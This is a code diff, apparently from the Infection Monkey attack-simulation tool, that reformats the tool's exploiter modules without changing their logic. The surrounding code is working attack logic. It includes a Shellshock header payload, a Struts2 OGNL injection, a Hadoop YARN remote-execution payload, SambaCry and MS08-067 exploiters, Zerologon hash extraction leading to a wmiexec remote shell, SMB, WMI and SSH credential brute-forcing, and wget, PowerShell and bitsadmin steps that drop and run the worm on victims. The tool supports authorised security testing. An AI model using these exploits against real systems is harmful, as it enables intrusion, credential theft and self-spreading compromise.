@@ -64,8 +64,7 @@ class HadoopExploiter(WebRCE):
    def exploit(self, url, command):
        # Get the newly created application id
        resp = requests.post(
            posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
        )
        resp = json.loads(resp.content)
        app_id = resp["application-id"]
@@ -75,8 +74,7 @@ class HadoopExploiter(WebRCE):
        )
        payload = self.build_payload(app_id, rand_name, command)
        resp = requests.post(
            posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
        )
        return resp.status_code == 202
@@ -93,8 +91,7 @@ class HadoopExploiter(WebRCE):
    def build_command(self, path, http_path):
        # Build command to execute
        monkey_cmd = build_monkey_commandline(
            self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
        )
        if "linux" in self.host.os["type"]:
            base_command = HADOOP_LINUX_COMMAND
@@ -102,22 +99,22 @@ class HadoopExploiter(WebRCE):
            base_command = HADOOP_WINDOWS_COMMAND
        return base_command % {
            "monkey_path": path,
            "http_path": http_path,
            "monkey_type": MONKEY_ARG,
            "parameters": monkey_cmd,
        }
    @staticmethod
    def build_payload(app_id, name, command):
        payload = {
            "application-id": app_id,
            "application-name": name,
            "am-container-spec": {
                "commands": {
                    "command": command,
                }
            },
            "application-type": "YARN",
        }
        return payload

View File

@@ -200,8 +200,7 @@ class MSSQLExploiter(HostExploiter):
            )
            LOG.info(
                "Successfully connected to host: {0}, using user: {1}, password ("
                "SHA-512): {2}".format(host, user, self._config.hash_sensitive_data(password))
            )
            self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
            self.report_login_attempt(True, user, password)

View File

@@ -95,7 +95,7 @@ class SambaCryExploiter(HostExploiter):
        self.exploit_info["shares"] = {}
        for share in writable_shares_creds_dict:
            self.exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
            self.try_exploit_share(share, writable_shares_creds_dict[share])
        # Wait for samba server to load .so, execute code and create result file.
@@ -118,10 +118,10 @@ class SambaCryExploiter(HostExploiter):
            if trigger_result is not None:
                successfully_triggered_shares.append((share, trigger_result))
                url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {
                    "username": creds["username"],
                    "host": self.host.ip_addr,
                    "port": self.SAMBA_PORT,
                    "share_name": share,
                }
                self.add_vuln_url(url)
            self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
@@ -195,8 +195,7 @@ class SambaCryExploiter(HostExploiter):
        file_content = None
        try:
            file_id = smb_client.openFile(
                tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
            )
            file_content = smb_client.readFile(tree_id, file_id)
            smb_client.closeFile(tree_id, file_id)
@@ -237,12 +236,12 @@ class SambaCryExploiter(HostExploiter):
        creds = self._config.get_exploit_user_password_or_hash_product()
        creds = [
            {"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash}
            for user, password, lm_hash, ntlm_hash in creds
        ]
        # Add empty credentials for anonymous shares.
        creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""})
        return creds
@@ -268,7 +267,7 @@ class SambaCryExploiter(HostExploiter):
        pattern_result = pattern.search(smb_server_name)
        is_vulnerable = False
        if pattern_result is not None:
            samba_version = smb_server_name[pattern_result.start() : pattern_result.end()]
            samba_version_parts = samba_version.split(".")
            if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"):
                is_vulnerable = True
@@ -406,8 +405,7 @@ class SambaCryExploiter(HostExploiter):
        return BytesIO(
            DROPPER_ARG
            + build_monkey_commandline(
                self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
            )
        )

View File

@@ -29,7 +29,7 @@ LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
class ShellShockExploiter(HostExploiter):
    _attacks = {"Content-type": "() { :;}; echo; "}
    _TARGET_OS_TYPE = ["linux"]
    _EXPLOITED_SERVICE = "Bash"
@@ -45,7 +45,7 @@ class ShellShockExploiter(HostExploiter):
    def _exploit_host(self):
        # start by picking ports
        candidate_services = {
            service: self.host.services[service]
            for service in self.host.services
            if ("name" in self.host.services[service])
            and (self.host.services[service]["name"] == "http")
@@ -243,7 +243,7 @@ class ShellShockExploiter(HostExploiter):
        LOG.debug("Header is: %s" % header)
        LOG.debug("Attack is: %s" % attack)
        r = requests.get(
            url, headers={header: attack}, verify=False, timeout=TIMEOUT
        )  # noqa: DUO123
        result = r.content.decode()
        return result


@ -24,8 +24,8 @@ class SmbExploiter(HostExploiter):
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = "SMB" _EXPLOITED_SERVICE = "SMB"
KNOWN_PROTOCOLS = { KNOWN_PROTOCOLS = {
"139/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 139), "139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139),
"445/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 445), "445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445),
} }
USE_KERBEROS = False USE_KERBEROS = False
@ -119,7 +119,7 @@ class SmbExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % { cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
"dropper_path":remote_full_path "dropper_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, self.host,
get_monkey_depth() - 1, get_monkey_depth() - 1,
@ -128,7 +128,7 @@ class SmbExploiter(HostExploiter):
) )
else: else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % { cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
"monkey_path":remote_full_path "monkey_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port
) )


@ -58,8 +58,7 @@ class SSHExploiter(HostExploiter):
try: try:
ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port) ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
LOG.debug( LOG.debug(
"Successfully logged in %s using %s users private key", self.host, "Successfully logged in %s using %s users private key", self.host, ssh_string
ssh_string
) )
self.report_login_attempt(True, user, ssh_key=ssh_string) self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh return ssh


@ -48,7 +48,7 @@ class Struts2Exploiter(WebRCE):
@staticmethod @staticmethod
def get_redirected(url): def get_redirected(url):
# Returns false if url is not right # Returns false if url is not right
headers = {"User-Agent":"Mozilla/5.0"} headers = {"User-Agent": "Mozilla/5.0"}
request = urllib.request.Request(url, headers=headers) request = urllib.request.Request(url, headers=headers)
try: try:
return urllib.request.urlopen( return urllib.request.urlopen(
@ -85,7 +85,7 @@ class Struts2Exploiter(WebRCE):
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
"(#ros.flush())}" % cmd "(#ros.flush())}" % cmd
) )
headers = {"User-Agent":"Mozilla/5.0", "Content-Type":payload} headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
try: try:
request = urllib.request.Request(url, headers=headers) request = urllib.request.Request(url, headers=headers)
# Timeout added or else we would wait for all monkeys' output # Timeout added or else we would wait for all monkeys' output


@ -26,12 +26,12 @@ def zerologon_exploiter_object(monkeypatch):
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object): def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode":0} dummy_exploit_attempt_result = {"ErrorCode": 0}
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result) assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object): def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode":1} dummy_exploit_attempt_result = {"ErrorCode": 1}
assert not zerologon_exploiter_object.assess_exploit_attempt_result( assert not zerologon_exploiter_object.assess_exploit_attempt_result(
dummy_exploit_attempt_result dummy_exploit_attempt_result
) )
@ -56,15 +56,15 @@ def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS)) f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
] ]
expected_extracted_creds = { expected_extracted_creds = {
USERS[0]:{ USERS[0]: {
"RID":int(RIDS[0]), "RID": int(RIDS[0]),
"lm_hash":LM_HASHES[0], "lm_hash": LM_HASHES[0],
"nt_hash":NT_HASHES[0], "nt_hash": NT_HASHES[0],
}, },
USERS[1]:{ USERS[1]: {
"RID":int(RIDS[1]), "RID": int(RIDS[1]),
"lm_hash":LM_HASHES[1], "lm_hash": LM_HASHES[1],
"nt_hash":NT_HASHES[1], "nt_hash": NT_HASHES[1],
}, },
} }
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
@ -76,8 +76,8 @@ def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS)) f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
] ]
expected_extracted_creds = { expected_extracted_creds = {
USERS[0]:{"RID":int(RIDS[0]), "lm_hash":"", "nt_hash":""}, USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""},
USERS[1]:{"RID":int(RIDS[1]), "lm_hash":"", "nt_hash":""}, USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""},
} }
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds


@ -32,8 +32,7 @@ class TestPayload(TestCase):
pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix") pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix")
array2 = pld2.split_into_array_of_smaller_payloads() array2 = pld2.split_into_array_of_smaller_payloads()
test2 = bool( test2 = bool(
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len( array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(array2) == 2
array2) == 2
) )
assert test1 and test2 assert test1 and test2


@ -60,12 +60,12 @@ class SmbTools(object):
return None return None
info = { info = {
"major_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"], "major_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
"minor_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"], "minor_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
"server_name":resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "), "server_name": resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
"server_comment":resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "), "server_comment": resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
"server_user_path":resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "), "server_user_path": resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
"simultaneous_users":resp["InfoStruct"]["ServerInfo102"]["sv102_users"], "simultaneous_users": resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
} }
LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info)) LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info))
@ -103,10 +103,10 @@ class SmbTools(object):
) )
continue continue
share_info = {"share_name":share_name, "share_path":share_path} share_info = {"share_name": share_name, "share_path": share_path}
if dst_path.lower().startswith(share_path.lower()): if dst_path.lower().startswith(share_path.lower()):
high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),) high_priority_shares += ((ntpath.sep + dst_path[len(share_path) :], share_info),)
low_priority_shares += ((ntpath.sep + file_name, share_info),) low_priority_shares += ((ntpath.sep + file_name, share_info),)
@ -128,8 +128,7 @@ class SmbTools(object):
smb.connectTree(share_name) smb.connectTree(share_name)
except Exception as exc: except Exception as exc:
LOG.debug( LOG.debug(
"Error connecting tree to share '%s' on victim %r: %s", share_name, host, "Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc
exc
) )
continue continue
@ -153,8 +152,7 @@ class SmbTools(object):
return remote_full_path return remote_full_path
LOG.debug( LOG.debug(
"Remote monkey file is found but different, moving along with " "Remote monkey file is found but different, moving along with " "attack"
"attack"
) )
except Exception: except Exception:
pass # file isn't found on remote victim, moving on pass # file isn't found on remote victim, moving on
@ -167,8 +165,7 @@ class SmbTools(object):
file_uploaded = True file_uploaded = True
T1105Telem( T1105Telem(
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path
dst_path
).send() ).send()
LOG.info( LOG.info(
"Copied monkey file '%s' to remote share '%s' [%s] on victim %r", "Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
@ -181,8 +178,7 @@ class SmbTools(object):
break break
except Exception as exc: except Exception as exc:
LOG.debug( LOG.debug(
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host, "Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc
exc
) )
T1105Telem( T1105Telem(
ScanStatus.SCANNED, ScanStatus.SCANNED,
@ -228,9 +224,9 @@ class SmbTools(object):
return None, None return None, None
dialect = { dialect = {
SMB_DIALECT:"SMBv1", SMB_DIALECT: "SMBv1",
SMB2_DIALECT_002:"SMBv2.0", SMB2_DIALECT_002: "SMBv2.0",
SMB2_DIALECT_21:"SMBv2.1", SMB2_DIALECT_21: "SMBv2.1",
}.get(smb.getDialect(), "SMBv3.0") }.get(smb.getDialect(), "SMBv3.0")
# we know this should work because the WMI connection worked # we know this should work because the WMI connection worked


@ -122,7 +122,7 @@ class VSFTPDExploiter(HostExploiter):
# Upload the monkey to the machine # Upload the monkey to the machine
monkey_path = dropper_target_path_linux monkey_path = dropper_target_path_linux
download_command = WGET_HTTP_UPLOAD % {"monkey_path":monkey_path, "http_path":http_path} download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path}
download_command = str.encode(str(download_command) + "\n") download_command = str.encode(str(download_command) + "\n")
LOG.info("Download command is %s", download_command) LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command): if self.socket_send(backdoor_socket, download_command):
@ -135,7 +135,7 @@ class VSFTPDExploiter(HostExploiter):
http_thread.stop() http_thread.stop()
# Change permissions # Change permissions
change_permission = CHMOD_MONKEY % {"monkey_path":monkey_path} change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
change_permission = str.encode(str(change_permission) + "\n") change_permission = str.encode(str(change_permission) + "\n")
LOG.info("change_permission command is %s", change_permission) LOG.info("change_permission command is %s", change_permission)
backdoor_socket.send(change_permission) backdoor_socket.send(change_permission)
@ -146,9 +146,9 @@ class VSFTPDExploiter(HostExploiter):
self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT
) )
run_monkey = RUN_MONKEY % { run_monkey = RUN_MONKEY % {
"monkey_path":monkey_path, "monkey_path": monkey_path,
"monkey_type":MONKEY_ARG, "monkey_type": MONKEY_ARG,
"parameters":parameters, "parameters": parameters,
} }
# Set unlimited to memory # Set unlimited to memory


@ -52,9 +52,9 @@ class WebRCE(HostExploiter):
self.monkey_target_paths = monkey_target_paths self.monkey_target_paths = monkey_target_paths
else: else:
self.monkey_target_paths = { self.monkey_target_paths = {
"linux":self._config.dropper_target_path_linux, "linux": self._config.dropper_target_path_linux,
"win32":self._config.dropper_target_path_win_32, "win32": self._config.dropper_target_path_win_32,
"win64":self._config.dropper_target_path_win_64, "win64": self._config.dropper_target_path_win_64,
} }
self.HTTP = [str(port) for port in self._config.HTTP_PORTS] self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.skip_exist = self._config.skip_exploit_if_file_exist self.skip_exist = self._config.skip_exploit_if_file_exist
@ -170,7 +170,7 @@ class WebRCE(HostExploiter):
candidate_services = {} candidate_services = {}
candidate_services.update( candidate_services.update(
{ {
service:self.host.services[service] service: self.host.services[service]
for service in self.host.services for service in self.host.services
if ( if (
self.host.services[service] self.host.services[service]
@ -202,7 +202,7 @@ class WebRCE(HostExploiter):
else: else:
command = commands["windows"] command = commands["windows"]
# Format command # Format command
command = command % {"monkey_path":path, "http_path":http_path} command = command % {"monkey_path": path, "http_path": http_path}
except KeyError: except KeyError:
LOG.error( LOG.error(
"Provided command is missing/bad for this type of host! " "Provided command is missing/bad for this type of host! "
@ -372,8 +372,8 @@ class WebRCE(HostExploiter):
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp: if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
LOG.info("Powershell not found in host. Using bitsadmin to download.") LOG.info("Powershell not found in host. Using bitsadmin to download.")
backup_command = BITSADMIN_CMDLINE_HTTP % { backup_command = BITSADMIN_CMDLINE_HTTP % {
"monkey_path":dest_path, "monkey_path": dest_path,
"http_path":http_path, "http_path": http_path,
} }
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send() T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
resp = self.exploit(url, backup_command) resp = self.exploit(url, backup_command)
@ -402,7 +402,7 @@ class WebRCE(HostExploiter):
LOG.info("Started http server on %s", http_path) LOG.info("Started http server on %s", http_path)
# Choose command: # Choose command:
if not commands: if not commands:
commands = {"windows":POWERSHELL_HTTP_UPLOAD, "linux":WGET_HTTP_UPLOAD} commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD}
command = self.get_command(paths["dest_path"], http_path, commands) command = self.get_command(paths["dest_path"], http_path, commands)
resp = self.exploit(url, command) resp = self.exploit(url, command)
self.add_executed_cmd(command) self.add_executed_cmd(command)
@ -415,7 +415,7 @@ class WebRCE(HostExploiter):
if resp is False: if resp is False:
return resp return resp
else: else:
return {"response":resp, "path":paths["dest_path"]} return {"response": resp, "path": paths["dest_path"]}
def change_permissions(self, url, path, command=None): def change_permissions(self, url, path, command=None):
""" """
@ -430,7 +430,7 @@ class WebRCE(HostExploiter):
LOG.info("Permission change not required for windows") LOG.info("Permission change not required for windows")
return True return True
if not command: if not command:
command = CHMOD_MONKEY % {"monkey_path":path} command = CHMOD_MONKEY % {"monkey_path": path}
try: try:
resp = self.exploit(url, command) resp = self.exploit(url, command)
T1222Telem(ScanStatus.USED, command, self.host).send() T1222Telem(ScanStatus.USED, command, self.host).send()
@ -448,8 +448,7 @@ class WebRCE(HostExploiter):
return False return False
elif "No such file or directory" in resp: elif "No such file or directory" in resp:
LOG.error( LOG.error(
"Could not change permission because monkey was not found. Check path " "Could not change permission because monkey was not found. Check path " "parameter."
"parameter."
) )
return False return False
LOG.info("Permission change finished") LOG.info("Permission change finished")
@ -474,18 +473,18 @@ class WebRCE(HostExploiter):
self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path
) )
command = RUN_MONKEY % { command = RUN_MONKEY % {
"monkey_path":path, "monkey_path": path,
"monkey_type":DROPPER_ARG, "monkey_type": DROPPER_ARG,
"parameters":monkey_cmd, "parameters": monkey_cmd,
} }
else: else:
monkey_cmd = build_monkey_commandline( monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, self.vulnerable_port self.host, get_monkey_depth() - 1, self.vulnerable_port
) )
command = RUN_MONKEY % { command = RUN_MONKEY % {
"monkey_path":path, "monkey_path": path,
"monkey_type":MONKEY_ARG, "monkey_type": MONKEY_ARG,
"parameters":monkey_cmd, "parameters": monkey_cmd,
} }
try: try:
LOG.info("Trying to execute monkey using command: {}".format(command)) LOG.info("Trying to execute monkey using command: {}".format(command))
@ -556,7 +555,7 @@ class WebRCE(HostExploiter):
dest_path = self.get_monkey_upload_path(src_path) dest_path = self.get_monkey_upload_path(src_path)
if not dest_path: if not dest_path:
return False return False
return {"src_path":src_path, "dest_path":dest_path} return {"src_path": src_path, "dest_path": dest_path}
def get_default_dropper_path(self): def get_default_dropper_path(self):
""" """


@ -24,8 +24,8 @@ REQUEST_TIMEOUT = 5
EXECUTION_TIMEOUT = 15 EXECUTION_TIMEOUT = 15
# Malicious requests' headers: # Malicious requests' headers:
HEADERS = { HEADERS = {
"Content-Type":"text/xml;charset=UTF-8", "Content-Type": "text/xml;charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) " "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36",
} }
@ -65,7 +65,7 @@ class WebLogic201710271(WebRCE):
def __init__(self, host): def __init__(self, host):
super(WebLogic201710271, self).__init__( super(WebLogic201710271, self).__init__(
host, {"linux":"/tmp/monkey.sh", "win32":"monkey32.exe", "win64":"monkey64.exe"} host, {"linux": "/tmp/monkey.sh", "win32": "monkey32.exe", "win64": "monkey64.exe"}
) )
def get_exploit_config(self): def get_exploit_config(self):
@ -292,7 +292,7 @@ class WebLogic20192725(WebRCE):
return False return False
def check_if_exploitable(self, url): def check_if_exploitable(self, url):
headers = copy.deepcopy(HEADERS).update({"SOAPAction":""}) headers = copy.deepcopy(HEADERS).update({"SOAPAction": ""})
res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT) res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text: if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
return True return True


@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
_TARGET_OS_TYPE = ["windows"] _TARGET_OS_TYPE = ["windows"]
_EXPLOITED_SERVICE = "Microsoft Server Service" _EXPLOITED_SERVICE = "Microsoft Server Service"
_windows_versions = { _windows_versions = {
"Windows Server 2003 3790 Service Pack 2":WindowsVersion.Windows2003_SP2, "Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2":WindowsVersion.Windows2003_SP2, "Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows 5.1":WindowsVersion.WindowsXP, "Windows 5.1": WindowsVersion.WindowsXP,
} }
def __init__(self, host): def __init__(self, host):
@ -286,7 +286,7 @@ class Ms08_067_Exploiter(HostExploiter):
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % { cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path":remote_full_path "dropper_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, self.host,
get_monkey_depth() - 1, get_monkey_depth() - 1,
@ -295,7 +295,7 @@ class Ms08_067_Exploiter(HostExploiter):
) )
else: else:
cmdline = MONKEY_CMDLINE_WINDOWS % { cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path":remote_full_path "monkey_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT
) )


@ -66,9 +66,7 @@ class WmiExploiter(HostExploiter):
continue continue
except socket.error: except socket.error:
LOG.debug( LOG.debug(
( ("Network error in WMI connection to %r with " % self.host) + creds_for_logging
"Network error in WMI connection to %r with " % self.host) +
creds_for_logging
) )
return False return False
except Exception as exc: except Exception as exc:
@ -112,7 +110,7 @@ class WmiExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % { cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path":remote_full_path "dropper_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, self.host,
get_monkey_depth() - 1, get_monkey_depth() - 1,
@ -121,7 +119,7 @@ class WmiExploiter(HostExploiter):
) )
else: else:
cmdline = MONKEY_CMDLINE_WINDOWS % { cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path":remote_full_path "monkey_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT
) )


@ -253,9 +253,9 @@ class ZerologonExploiter(HostExploiter):
user_RID, lmhash, nthash = parts_of_secret[1:4] user_RID, lmhash, nthash = parts_of_secret[1:4]
self._extracted_creds[user] = { self._extracted_creds[user] = {
"RID":int(user_RID), # relative identifier "RID": int(user_RID), # relative identifier
"lm_hash":lmhash, "lm_hash": lmhash,
"nt_hash":nthash, "nt_hash": nthash,
} }
def store_extracted_creds_for_exploitation(self) -> None: def store_extracted_creds_for_exploitation(self) -> None:
@ -274,11 +274,11 @@ class ZerologonExploiter(HostExploiter):
def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None: def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
self.exploit_info["credentials"].update( self.exploit_info["credentials"].update(
{ {
user:{ user: {
"username":user, "username": user,
"password":"", "password": "",
"lm_hash":lmhash, "lm_hash": lmhash,
"ntlm_hash":nthash, "ntlm_hash": nthash,
} }
} }
) )
@ -331,8 +331,7 @@ class ZerologonExploiter(HostExploiter):
) )
wmiexec = Wmiexec( wmiexec = Wmiexec(
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip
domain=self.dc_ip
) )
remote_shell = wmiexec.get_remote_shell() remote_shell = wmiexec.get_remote_shell()


@ -22,24 +22,24 @@ __author__ = "itamar"
LOG = None LOG = None
LOG_CONFIG = { LOG_CONFIG = {
"version":1, "version": 1,
"disable_existing_loggers":False, "disable_existing_loggers": False,
"formatters":{ "formatters": {
"standard":{ "standard": {
"format":"%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(" "format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
"funcName)s.%(lineno)d: %(message)s" "funcName)s.%(lineno)d: %(message)s"
}, },
}, },
"handlers":{ "handlers": {
"console":{"class":"logging.StreamHandler", "level":"DEBUG", "formatter":"standard"}, "console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"},
"file":{ "file": {
"class":"logging.FileHandler", "class": "logging.FileHandler",
"level":"DEBUG", "level": "DEBUG",
"formatter":"standard", "formatter": "standard",
"filename":None, "filename": None,
}, },
}, },
"root":{"level":"DEBUG", "handlers":["console"]}, "root": {"level": "DEBUG", "handlers": ["console"]},
} }
@ -128,8 +128,7 @@ def main():
sys.excepthook = log_uncaught_exceptions sys.excepthook = log_uncaught_exceptions
LOG.info( LOG.info(
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, ">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid()
os.getpid()
) )
LOG.info(f"version: {get_version()}") LOG.info(f"version: {get_version()}")


@ -100,8 +100,7 @@ class InfectionMonkey(object):
WormConfiguration.command_servers.insert(0, self._default_server) WormConfiguration.command_servers.insert(0, self._default_server)
else: else:
LOG.debug( LOG.debug(
"Default server: %s is already in command servers list" % "Default server: %s is already in command servers list" % self._default_server
self._default_server
) )
def start(self): def start(self):
@ -220,7 +219,7 @@ class InfectionMonkey(object):
# Order exploits according to their type # Order exploits according to their type
self._exploiters = sorted( self._exploiters = sorted(
self._exploiters, key=lambda exploiter_:exploiter_.EXPLOIT_TYPE.value self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value
) )
host_exploited = False host_exploited = False
for exploiter in [exploiter(machine) for exploiter in self._exploiters]: for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
@ -252,8 +251,7 @@ class InfectionMonkey(object):
if len(self._exploited_machines) > 0: if len(self._exploited_machines) > 0:
time_to_sleep = WormConfiguration.keep_tunnel_open_time time_to_sleep = WormConfiguration.keep_tunnel_open_time
LOG.info( LOG.info(
"Sleeping %d seconds for exploited machines to connect to tunnel", "Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep
